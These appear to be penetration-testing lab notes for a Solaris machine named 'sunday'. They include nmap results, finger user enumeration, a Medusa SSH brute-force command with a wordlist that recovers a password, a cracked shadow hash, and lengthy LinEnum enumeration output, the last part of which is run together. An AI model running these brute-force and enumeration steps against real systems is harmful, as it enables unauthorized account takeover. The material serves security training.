nmap -sC -sV -Pn
Starting Nmap 7.80 (
Nmap scan report for
Host is up (0.025s latency).
Not shown: 993 closed ports
PORT      STATE    SERVICE    VERSION
79/tcp    open     tcpwrapped
|_finger: ERROR: Script execution failed (use -d to debug)
111/tcp   open     tcpwrapped
1864/tcp  filtered paradym-31
5102/tcp  filtered admeng
5989/tcp  filtered wbem-https
12345/tcp filtered netbus
19315/tcp filtered keyshadow
22022/tcp open     ssh        SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Discovery of Vulnerability
Exploit Code Used

$ medusa -u sunny -P /usr/share/wordlists/rockyou.txt -M ssh -h -n 22022
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: (1 of 1, 0 complete) User: sunny (1 of 1, 0 complete) Password: sunday (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: User: sunny Password: sunday [SUCCESS]

Later found backup of the shadow file.
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
CRACKED HASH TO cooldude!

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10164
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Fri Jul 17 09:38:28 2020 #########
access@ access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@ Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@ Login Name TTY Idle When Where..anne ???..marie ???..
bin@ bin ??? < . . . . >..
dee dee@ Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@ Login Name TTY Idle When Where..jo ???..ann ???..
la verne@ Login Name TTY Idle When Where..la ???..verne ???..
line@ Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@ Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@ Login Name TTY Idle When Where..miof ???..mela ???..
root@ root Super-User pts/3 <Apr 24, 2018> sunday ..
sammy@ sammy pts/2 <Apr 24, 2018> ..
sys@ sys ??? < . . . . >..
zsa zsa@ Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Fri Jul 17 10:05:22 2020 #########
14 results.

10164 queries in 1614 seconds (6.3 queries / sec)

daemon gdm mysql nobody nobody4 postgres svctag webservd zfssnap sunny sammy

Service Exploited: SSH
Vulnerability Type: NO ACCOUNT LOCKOUT POLICY
Exploit POC:
Description: Finger is running on Port 79
http://pentestmonkey.net/tools/user-enumeration/finger-user-enum has user enumeration script
Found Users:
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

################################
# Local Linux Enumeration & Privilege Escalation Script
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Enabled

Scan started at: Fri Jul 17 15:12:42 IST 2020

### SYSTEM ##############################################

[-] Kernel information:
SunOS sunday 5.11 snv_111b i86pc i386 i86pc Solaris

[-] Hostname:
sunday

### USER/GROUP ##########################################

[-] Current user/group info:
uid=65535(sunny) gid=1(other) groups=1(other)

[-] Who else is logged on:
3:12pm up 1:46, 1 user, load average: 0.00, 0.00, 0.00
User tty login@ idle JCPU PCPU what
sunny pts/2 3:07pm w

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
uid=1(daemon) gid=1(other) groups=1(other),2(bin),4(adm)
uid=2(bin) gid=2(bin) groups=2(bin),3(sys)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(adm) gid=4(adm) groups=4(adm),3(sys),7(tty),8(lp)
uid=71(lp) gid=8(lp) groups=8(lp)
uid=5(uucp) gid=5(uucp) groups=5(uucp)
uid=9(nuucp) gid=9(nuucp) groups=9(nuucp)
uid=15(dladm) gid=3(sys) groups=3(sys)
uid=25(smmsp) gid=25(smmsp) groups=25(smmsp)
uid=37(listen) gid=4(adm) groups=4(adm)
uid=50(gdm) gid=50(gdm) groups=50(gdm)
uid=51(zfssnap) gid=12(daemon) groups=12(daemon)
uid=60(xvm) gid=60(xvm) groups=60(xvm)
uid=70(mysql) gid=70(mysql) groups=70(mysql)
uid=75(openldap) gid=75(openldap) groups=75(openldap)
uid=80(webservd) gid=80(webservd) groups=80(webservd)
uid=90(postgres) gid=90(postgres) groups=90(postgres)
uid=95(svctag) gid=12(daemon) groups=12(daemon)
uid=60001(nobody) gid=60001(nobody) groups=60001(nobody)
uid=60002(noaccess) gid=60002(noaccess) groups=60002(noaccess)
uid=65534(nobody4) gid=65534(nogroup) groups=65534(nogroup)
uid=101(sammy) gid=10(staff) groups=10(staff)
uid=65535(sunny) gid=1(other) groups=1(other)

[-] It looks like we have some admin users:
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
uid=1(daemon) gid=1(other) groups=1(other),2(bin),4(adm)
uid=4(adm) gid=4(adm) groups=4(adm),3(sys),7(tty),8(lp)
uid=37(listen) gid=4(adm) groups=4(adm)

[-] Contents of /etc/passwd:
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:x:15:3:Datalink Admin:/:
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:x:60:60:xVM User:/:
mysql:x:70:70:MySQL Reserved UID:/:
openldap:x:75:75:OpenLDAP User:/:
webservd:x:80:80:WebServer Reserved UID:/:
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash

[-] Super user account(s):
root

[+] We can sudo without supplying a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value] {-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[+] Possible sudo pwnage!
file

[-] Are permissions on /home directories lax:
total 2.0K
dr-xr-xr-x 1 root root 1 2020-07-17 13:26 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..

[-] Files owned by our user:
-rw------- 1 sunny other 255 2018-04-15 20:29 /export/home/sunny/.nautilus/metafiles/x-nautilus-desktop:%2F%2F%2F.xml
-rw------- 1 sunny other 466 2018-04-15 20:29 /export/home/sunny/.nautilus/metafiles/file:%2F%2F%2Fexport%2Fhome%2Fsunny%2FDesktop.xml
-rw-r--r-- 1 sunny other 280 2018-04-15 20:18 /export/home/sunny/.bashrc
-rw-r--r-- 1 sunny other 988 2018-04-15 20:18 /export/home/sunny/local.login
-rw------- 1 sunny other 167 2018-04-15 20:29 /export/home/sunny/.ICEauthority
-rw-r--r-- 1 sunny other 8 2018-04-15 20:29 /export/home/sunny/.chewing/uhash.dat
-rw-r--r-- 1 sunny other 13 2018-04-15 20:31 /export/home/sunny/.updatemanager/notify/opensolaris-lastcheck
-rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/.local/share/codeina/mozembed/.parentlock
-rw-r--r-- 1 sunny other 458 2018-04-15 20:29 /export/home/sunny/.dbus/session-bus/98a1bc55dc30eb272f68a0145ad3ab13-0
-rw-r--r-- 1 sunny other 3094 2018-04-15 20:52 /export/home/sunny/.xsession-errors
-rwx------ 1 sunny other 98355 2018-04-15 20:52 /export/home/sunny/.gconfd/saved_state
-rw-r--r-- 1 sunny other 1002 2018-04-15 20:18 /export/home/sunny/local.profile
-rw-r--r-- 1 sunny other 3009 2018-04-15 20:29 /export/home/sunny/Desktop/addmoresoftware.desktop
-rw-r--r-- 1 sunny other 2070 2018-04-15 20:29 /export/home/sunny/Desktop/register-opensolaris.desktop
-rw-r--r-- 1 sunny other 2176 2018-04-15 20:29 /export/home/sunny/Desktop/opensolaris-next-steps.desktop
-rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/Desktop/.os-icons-installed
-rw-r--r-- 1 sunny other 611 2018-04-15 20:18 /export/home/sunny/.profile
-rw-r--r-- 1 sunny other 2 2018-04-15 20:29 /export/home/sunny/.gnome2/share/cursor-fonts/fonts.dir
-rw-r--r-- 1 sunny other 2 2018-04-15 20:29 /export/home/sunny/.gnome2/share/fonts/fonts.dir
-rw-r----- 1 sunny other 0 2018-04-15 20:51 /export/home/sunny/.gksu.lock
-rw------- 1 sunny other 5288 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/input_methods/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/%gconf.xml
-rw------- 1 sunny other 441 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/gnome/input_methods/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/gnome/%gconf.xml
-rw------- 1 sunny other 1923 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/trash_screen0/%gconf.xml
-rw------- 1 sunny other 1929 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/workspace_switcher_screen0/%gconf.xml
-rw------- 1 sunny other 445 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/workspace_switcher_screen0/prefs/%gconf.xml
-rw------- 1 sunny other 1914 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/mixer_screen0/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:52 /export/home/sunny/.gconf/apps/panel/applets/%gconf.xml
-rw------- 1 sunny other 1914 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/clock_screen0/%gconf.xml
-rw------- 1 sunny other 2382 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/clock_screen0/prefs/%gconf.xml
-rw------- 1 sunny other 1924 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/show_desktop_button_screen0/%gconf.xml
-rw------- 1 sunny other 1925 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/notification_area_screen0/%gconf.xml
-rw------- 1 sunny other 1923 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/window_list_screen0/%gconf.xml
-rw------- 1 sunny other 670 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/window_list_screen0/prefs/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/%gconf.xml
-rw------- 1 sunny other 1812 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/menu_bar_screen0/%gconf.xml
-rw------- 1 sunny other 1908 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/browser_launcher_screen0/%gconf.xml
-rw------- 1 sunny other 1915 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/terminal_launcher_screen0/%gconf.xml
-rw------- 1 sunny other 1914 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/home_launcher_screen0/%gconf.xml
-rw------- 1 sunny other 1912 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/email_launcher_screen0/%gconf.xml
-rw------- 1 sunny other 1915 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/ips_launcher_screen0/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/%gconf.xml
-rw------- 1 sunny other 2292 2018-04-15 20:52 /export/home/sunny/.gconf/apps/panel/general/%gconf.xml
-rw------- 1 sunny other 2196 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/bottom_panel_screen0/%gconf.xml
-rw------- 1 sunny other 1107 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/bottom_panel_screen0/background/%gconf.xml
-rw------- 1 sunny other 2156 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/top_panel_screen0/%gconf.xml
-rw------- 1 sunny other 1104 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/top_panel_screen0/background/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-power-manager/%gconf.xml
-rw------- 1 sunny other 174 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-power-manager/cpufreq/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:32 /export/home/sunny/.gconf/apps/updatemanager/%gconf.xml
-rw------- 1 sunny other 145 2018-04-15 20:32 /export/home/sunny/.gconf/apps/updatemanager/preferences/%gconf.xml
-rw------- 1 sunny other 245 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gimlet/preference/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gimlet/%gconf.xml
-rw------- 1 sunny other 143 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-screensaver/%gconf.xml
-rw------- 1 sunny other 177 2018-04-15 20:30 /export/home/sunny/.gconf/apps/nwam-manager/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-terminal/profiles/%gconf.xml
-rw------- 1 sunny other 576 2018-04-15 20:52 /export/home/sunny/.gconf/apps/gnome-terminal/profiles/Default/%gconf.xml
-rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-terminal/%gconf.xml
-rw-r--r-- 1 sunny other 1039 2018-04-15 20:18 /export/home/sunny/local.cshrc
-rw------- 1 sunny other 26 2018-04-15 20:29 /export/home/sunny/.dmrc
-rw-r--r-- 1 sunny other 37 2018-04-15 20:29 /export/home/sunny/.printer-groups.xml
-rw-r--r-- 1 sunny other 5 2018-04-15 20:29 /export/home/sunny/.config/user-dirs.locale
-rw------- 1 sunny other 672 2018-04-15 20:29 /export/home/sunny/.config/user-dirs.dirs
-rw-r--r-- 1 sunny other 202 2018-04-15 20:29 /export/home/sunny/.gtk-bookmarks
-rw------- 1 sunny other 192473 2018-04-15 20:29 /export/home/sunny/.gstreamer-0.10/registry.i386.bin
-rwxr-xr-x 1 sunny other 46631 2020-07-17 20:36 /tmp/LinEnum.sh
-rw-r--r-- 1 sunny other 4095 2020-07-17 15:12 /tmp/output.txt

[-] Hidden files:
--wsr--r-x 1 root root 0 2018-04-16 01:12 /media/.hal-mtab-lock
-rw-r--r-- 1 root root 0 2020-07-17 13:26 /media/.hal-mtab
-rw-r--r-- 1 sammy staff 202 2018-04-16 15:27 /export/home/sammy/.gtk-bookmarks
-rw-r--r-- 1 sammy staff 2991 2018-04-16 15:33 /export/home/sammy/.xsession-errors
-rw-r--r-- 1 sammy staff 611 2018-04-15 19:52 /export/home/sammy/.profile
-rw------- 1 sammy staff 26 2018-04-24 11:22 /export/home/sammy/.dmrc
-rw-r--r-- 1 sammy staff 0 2018-04-15 20:15 /export/home/sammy/Desktop/.os-icons-installed
-rw-r--r-- 1 sammy staff 37 2018-04-15 20:15 /export/home/sammy/.printer-groups.xml
-rw------- 1 root root 0 2018-04-24 11:28 /export/home/sammy/.bash_history
-rw-r--r-- 1 sammy staff 280 2018-04-15 19:52 /export/home/sammy/.bashrc
-rw------- 1 sammy staff 336 2018-04-16 15:27 /export/home/sammy/.ICEauthority
-rw-r--r-- 1 sunny other 280 2018-04-15 20:18 /export/home/sunny/.bashrc
-rw------- 1 sunny other 167 2018-04-15 20:29 /export/home/sunny/.ICEauthority
-rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/.local/share/codeina/mozembed/.parentlock
-rw------- 1 root root 0 2018-04-24 09:10 /export/home/sunny/.bash_history
-rw-r--r-- 1 sunny other 3094 2018-04-15 20:52 /export/home/sunny/.xsession-errors
-rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/Desktop/.os-icons-installed
-rw-r--r-- 1 sunny other 611 2018-04-15 20:18 /export/home/sunny/.profile
-rw-r----- 1 sunny other 0 2018-04-15 20:51 /export/home/sunny/.gksu.lock
-rw------- 1 sunny other 26 2018-04-15 20:29 /export/home/sunny/.dmrc
-rw-r--r-- 1 sunny other 37 2018-04-15 20:29 /export/home/sunny/.printer-groups.xml
-rw-r--r-- 1 sunny other 202 2018-04-15 20:29 /export/home/sunny/.gtk-bookmarks
-rw-r--r-- 1 root root 0 2018-04-16 01:12 /var/sadm/install/.pkg.lock
-r--r--r-- 1 root root 11 2020-07-17 13:26 /tmp/.X0-lock
-rw-r--r-- 1 root root 309 2018-04-15 19:52 /etc/.sysIDtool.state
-rw-r--r-- 1 root sys 1429 2009-05-14 21:18 /etc/.login
-rw-r--r-- 1 root root 26 2018-04-15 20:28 /etc/sma/snmp/mibs/.index
-rw-r--r-- 1 root root 156 2018-04-15 19:52 /etc/.sysidconfig.apps
-rw-r--r-- 1 root root 4 2018-04-24 09:24 /etc/dev/.devfsadm_dev.lock
-rw-r--r-- 1 root root 0 2018-04-16 01:12 /etc/dev/.devfsadm_daemon.lock
-rw-r--r-- 1 root root 106496 2020-07-17 15:12 /etc/dev/.devlink_db
-rw-r--r-- 1 root root 0 2009-05-14 21:23 /etc/dev/.devlink_db_lock
-rwxr--r-- 1 root sys 982 2009-05-14 21:18 /etc/cron.d/.proto
-rw------- 1 root root 0 2018-04-15 20:18 /etc/.pwd.lock
-rw-r--r-- 1 root other 280 2009-05-14 21:18 /etc/skel/.bashrc
-rw-r--r-- 1 root other 611 2009-05-14 21:18 /etc/skel/.profile
-rw-r--r-- 1 root root 2236 2020-07-17 13:26 /etc/.cpr_config
-r--r--r-- 1 root bin 74916 2009-05-14 21:21 /usr/perl5/5.8.4/lib/i86pc-solaris-64int/.packlist
-rwxr-xr-x 1 root bin 454 2009-05-14 21:22 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/Pidgin/.packlist
-rwxr-xr-x 1 root bin 585 2009-05-14 21:22 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/Purple/.packlist
-rw-r--r-- 1 root bin 684 2009-05-14 21:21 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/Authen/PAM/.packlist
-rw-r--r-- 1 root bin 4712 2009-05-14 21:21 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/XML/Parser/.packlist
-rw-r--r-- 1 root bin 388 2009-05-14 21:21 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/XML/Simple/.packlist
-rw-r--r-- 1 root bin 29 2009-05-14 21:21 /usr/lib/firefox/.autoreg

[-] Home directory contents:
total 45K
drwxr-xr-x 18 sunny other 30 2018-04-15 20:52 .
drwxr-xr-x 4 root root 4 2018-04-15 20:18 ..
-rw------- 1 root root 0 2018-04-24 09:10 .bash_history
-rw-r--r-- 1 sunny other 280 2018-04-15 20:18 .bashrc
drwx------ 2 sunny other 3 2018-04-15 20:29 .chewing
drwxr-xr-x 2 sunny other 4 2018-04-15 20:29 .config
drwx------ 3 sunny other 3 2018-04-15 20:29 .dbus
drwxr-xr-x 2 sunny other 6 2018-04-15 20:29 Desktop
-rw------- 1 sunny other 26 2018-04-15 20:29 .dmrc
drwxr-xr-x 6 sunny other 6 2018-04-15 20:29 Documents
drwxr-xr-x 2 sunny other 2 2018-04-15 20:29 Downloads
drwx------ 4 sunny other 4 2018-04-15 20:30 .gconf
drwx------ 2 sunny other 3 2018-04-15 20:52 .gconfd
-rw-r----- 1 sunny other 0 2018-04-15 20:51 .gksu.lock
drwx------ 7 sunny other 7 2018-04-15 20:29 .gnome2
drwx------ 2 sunny other 2 2018-04-15 20:29 .gnome2_private
drwxr-xr-x 2 sunny other 3 2018-04-15 20:29 .gstreamer-0.10
-rw-r--r-- 1 sunny other 202 2018-04-15 20:29 .gtk-bookmarks
-rw------- 1 sunny other 167 2018-04-15 20:29 .ICEauthority
drwx------ 3 sunny other 3 2018-04-15 20:29 .iiim
drwx------ 3 sunny other 3 2018-04-15 20:29 .local
-rw-r--r-- 1 sunny other 1.1K 2018-04-15 20:18 local.cshrc
-rw-r--r-- 1 sunny other 988 2018-04-15 20:18 local.login
-rw-r--r-- 1 sunny other 1002 2018-04-15 20:18 local.profile
drwxr-xr-x 3 sunny other 3 2018-04-15 20:29 .nautilus
-rw-r--r-- 1 sunny other 37 2018-04-15 20:29 .printer-groups.xml
-rw-r--r-- 1 sunny other 611 2018-04-15 20:18 .profile
drwxr-xr-x 2 sunny other 2 2018-04-15 20:29 Public
drwxr-xr-x 3 sunny other 3 2018-04-15 20:31 .updatemanager
-rw-r--r-- 1 sunny other 3.1K 2018-04-15 20:52 .xsession-errors

### ENVIRONMENTAL #######################################

[-] Environment information:
MANPATH=/usr/gnu/share/man:/usr/share/man:/usr/X11/share/man
SHELL=/bin/bash
TERM=xterm-256color
SSH_CLIENT= 42578 22022
SSH_TTY=/dev/pts/2
USER=sunny
PAGER=/usr/bin/less -ins
PATH=/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin
MAIL=/var/mail/sunny
PWD=/tmp
LANG=en_US.UTF-8
TZ=Asia/Kolkata
HOME=/export/home/sunny
SHLVL=2
LOGNAME=sunny
SSH_CONNECTION= 42578 22022
_=/usr/gnu/bin/env

[-] Path information:
/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin
drwxr-xr-x 2 root sys 58 2018-04-15 19:53 /sbin
drwxr-xr-x 5 root bin 1187 2018-04-15 19:52 /usr/bin
drwxr-xr-x 2 root bin 90 2018-04-15 19:51 /usr/gnu/bin
drwxr-xr-x 4 root bin 394 2018-04-15 19:53 /usr/sbin
drwxr-xr-x 4 root bin 126 2018-04-15 19:51 /usr/X11/bin

[-] Current umask value:
u=rwx,g=rx,o=rx
0022

### JOBS/TASKS ##########################################

[-] Cron jobs:
lrwxrwxrwx 1 root root 16 2018-04-15 19:52 /etc/cron -> ../usr/sbin/cron

/etc/cron.d:
total 14
drwxr-xr-x 2 root sys 7 2020-07-17 13:26 .
drwxr-xr-x 77 root sys 224 2020-07-17 15:12 ..
-rw-r--r-- 1 root sys 17 2009-05-14 21:18 at.deny
-rw-r--r-- 1 root sys 17 2009-05-14 21:18 cron.deny
prw------- 1 root root 0 2020-07-17 13:26 FIFO
-rwxr--r-- 1 root sys 982 2009-05-14 21:18 .proto
-rw-r--r-- 1 root sys 17 2009-05-14 21:18 queuedefs

[-] Anything interesting in /var/spool/cron/crontabs:
total 11
drwxr-xr-x 2 root sys 6 2020-07-17 13:26 .
drwxr-xr-x 4 root sys 4 2009-05-14 21:18 ..
-rw------- 1 root sys 1004 2009-05-14 21:18 adm -r-------- 1 root root 1365 2009-05-14 21:21 lp -rw------- 1 root root 1069 2020-07-17 13:26 root -rw------- 1 root sys 1122 2009-05-14 21:22 sys [00;33m### NETWORKING ##########################################[00m [00;31m[-] Network and IP info:[00m lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1 inet netmask ff000000 pcn0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet netmask ffffff00 broadcast lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1 inet6 ::1/128 [00;31m[-] ARP history:[00m Net to Media Table: IPv4 Device IP Address Mask Flags Phys Addr ------ -------------------- --------------- -------- --------------- pcn0 o 00:50:56:b9:f9:ab pcn0 sunday SPLA 00:50:56:b9:d7):03 pcn0 SM 01:00:5e:00:00:00 [00;31m[-] Nameserver(s):[00m nameserver [00;33m### SERVICES #############################################[00m [00;31m[-] Running processes:[00m USER PID %CPU %MEM SZ RSS TT S START TIME COMMAND gdm 528 0.1 2.926668859320 ? S 13:26:50 0:03 /usr/lib/gdmgreete sunny 26263 0.1 0.1 4752 1528 pts/2 O 15:14:30 0:00 ps aux root 483 0.1 1.03962020008 ? S 13:26:46 0:03 /usr/X11/bin/Xorg root 3 0.1 0.0 0 0 ? S 13:26:23 0:01 fsflush sunny 25881 0.1 0.1 6260 1992 pts/2 S 15:12:40 0:00 /bin/bash ./LinEnu root 140 0.0 0.2 8756 3384 ? S 13:26:33 0:07 /usr/sbin/nscd root 514 0.0 0.1 5892 1984 ? S 13:26:48 0:00 /usr/bin/bash /roo root 26241 0.0 0.1 4068 944 ? S 15:14:26 0:00 /usr/gnu/bin/sleep root 9 0.0 0.61317211368 ? S 13:26:24 0:12 /lib/svc/bin/svc.c root 69 0.0 0*.312768 5288 ? S 13:26:31 0:00 devfsadmd root 0 0.0 0.0 0 0 ? T 13:26:22 0:01 sched root 1 0.0 0.1 2732 1032 ? S 13:26:23 0:00 /sbin/init root 2 0.0 0.0 0 0 ? S 13:26:23 0:00 pageout root 7 0.0 0.513936 8928 ? S 13:26:24 0:03 /lib/svc/bin/svc.s dladm 16 0.0 0.1 3060 1544 ? S 13:26:27 0:00 /sbin/dlmgmtd daemon 51 0.0 0.3 9404 4620 ? 
S 13:26:30 0:02 /lib/crypto/kcfd root 152 0.0 0.1 2120 1328 ? S 13:26:33 0:00 /usr/lib/power/pow root 160 0.0 0.1 7892 2320 ? S 13:26:33 0:00 /usr/lib/sysevent/ root 170 0.0 0.2 6488 2688 ? S 13:26:34 0:00 /usr/lib/picl/picl root 252 0.0 0.1 4800 1572 ? S 13:26:37 0:00 /usr/lib/dbus-daem root 328 0.0 0.1 4384 1120 ? S 13:26:39 0:00 /usr/sbin/cron root 332 0.0 0.3 6672 4876 ? S 13:26:39 0:01 /usr/lib/hal/hald root 333 0.0 0.1 3852 1848 ? S 13:26:39+ 0:00 hald-runner root 334 0.0 0.1 3956 1900 ? S 13:26:39 0:00 /usr/lib/hal/hald- root 336 0.0 0.1 3968 1912 ? S 13:26:40 0:00 /usr/lib/hal/hald- root 337 0.0 0.1 3876 2008 ? S 13:26:40 0:00 /usr/lib/hal/hald- daemon 348 0.0 0.1 3344 1204 ? S 13:26:41 0:00 /usr/sbin/rpcbind root 351 0.0 0.1 5136 1308 ? S 13:26:41 0:00 /usr/lib/autofs/au root 352 0.0 0.1 5208 1336 ? S 13:26:41 0:00 /usr/lib/autofs/au root 373 0.0 0.61947211776 ? S 13:26:41 0:01 /usr/lib/fm/fmd/fm root 374 0.0 0.1 2344 1060 ? S 13:26:41 0:00 /usr/lib/saf/sac - root 375 0.0 0.1 2504 1152 ? S 13:26:41 0:00 /usr/lib/saf/ttymo root 379 0.0 0.1 1636 756 ? S 13:26:42 0:00 /usr/lib/utmpd root 381 0.0 0.2 8748 3392 ? S 13:26:42 0:29 /usr/lib/inet/inet root 389 0.0 0.1 2756 1468 ? S 13:26:42 0:00 /usr/lib/hal/hald- root 397 0.0 0.1 2572 876 ? S ,13:26:42 0:00 /usr/lib/inet/in.n root 402 0.0 0.1 6656 1904 ? S 13:26:42 0:00 /usr/sbin/syslogd root 410 0.0 0.1 2008 1220 console S 13:26:42 0:00 /usr/lib/saf/ttymo root 421 0.0 0.1 6740 1596 ? S 13:26:43 0:00 /usr/lib/ssh/sshd noaccess 442 0.0 0.1 2688 1288 ? S 13:26:45 0:00 /usr/lib/inet/mdns daemon 460 0.0 0.1 3068 1704 ? S 13:26:45 0:00 /usr/sbin/avahi-da root 471 0.0 0.1 4192 1876 ? S 13:26:46 0:00 /usr/lib/rmvolmgr root 480 0.0 0.3 9128 5220 ? S 13:26:46 0:00 /usr/perl5/bin/per root 481 0.0 0.1 8092 1920 ? S 13:26:46 0:00 /usr/sbin/gdm-bina root 482 0.0 0.2 9444 2912 ? S 13:26:46 0:00 /usr/sbin/gdm-bina root 525 0.0 0.1 3520 1248 ? S 13:26:50 0:00 /usr/openwin/bin/f root 601 0.0 0.1 6136 1952 ? 
